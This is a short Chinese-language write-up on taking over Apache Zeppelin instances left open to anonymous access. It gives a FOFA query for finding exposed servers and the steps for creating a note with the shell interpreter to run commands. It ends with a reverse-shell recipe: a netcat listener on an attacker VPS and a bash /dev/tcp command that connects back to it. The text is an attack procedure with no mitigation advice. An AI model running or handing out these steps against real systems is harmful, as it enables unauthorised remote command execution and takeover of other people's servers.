Zeppelin未授权访问 getshell
Zeppelin未授权访问 getshell
1.漏洞简介
Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。
Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、Hive、Markdown、Shell等等
2.影响范围
fofa语句:title="Zeppelin"
需要有登录的用户为:anonymouse
3.漏洞复现
1.访问URL,首页:
进入首页后,需要已有登录的用户:anonymouse,其他的不可以
2.点击Create new note
在弹出的对话框中将 Default Interpreter 选择为 sh:
3.然后可以输入一些命令,进行执行了
4.反弹shell
先在设置 vps 监听端口,然后在命令输入框中输入 bash 命令进行上线
vps:nc -vlnp 2345
目标中输入:bash -i > /dev/tcp/VPS_IP/端口 <1
这时 vps 上有会话进行连接,成功反弹 shell